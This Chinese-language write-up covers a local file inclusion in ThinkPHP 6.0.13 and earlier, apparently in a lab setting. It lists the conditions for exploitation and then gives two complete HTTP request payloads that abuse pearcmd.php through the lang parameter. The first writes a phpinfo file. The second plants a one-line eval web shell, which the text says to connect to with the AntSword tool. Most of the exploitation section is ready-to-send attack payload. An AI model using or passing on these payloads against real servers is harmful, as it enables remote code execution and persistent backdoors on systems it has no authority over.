ThinkPHP 多语言本地文件包含漏洞

ThinkPHP 多语言本地文件包含漏洞

ThinkPHP是一个再中国使用比较多的PHP框架。在其6.0.13版本及以前，存在一处本地文件包含漏洞。当多语言特性被开启时，攻击者可以使用lang参数来包含任意php文件。

虽然只能包含本地PHP文件，但在开启了register_argc_argv且安装了pcel/pear的环境下，可以包含/usr/local/lib/php/pearcmd.php并写入任意文件。

漏洞利用
首先，ThinkPHP多语言特性不是默认开启的，所以我们可以尝试包含public/index.php文件来确认文件包含漏洞是否存在：

如果漏洞存在，则服务器会出错，返回500页面。
文件包含漏洞存在的情况下还需要服务器满足以下两个条件才能利用：

1. PHP环境开启了register_argc_argv
2. PHP环境安装了pcel/pear

Docker默认的PHP环境恰好满足这两个条件，所以我们可以直接使用下面这个数据包来写shell.php文件

GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+shell.php HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Cache-Control: max-age=0

如果服务器返回peaecmd的命令执行结果，说明漏洞利用成功：

此时访问/shell.php即可发现已经成功写入文件：

或者写入一句话木马

GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=@eval($_POST['hack'])?>+hack.php HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Cache-Control: max-age=0

使用蚁剑连接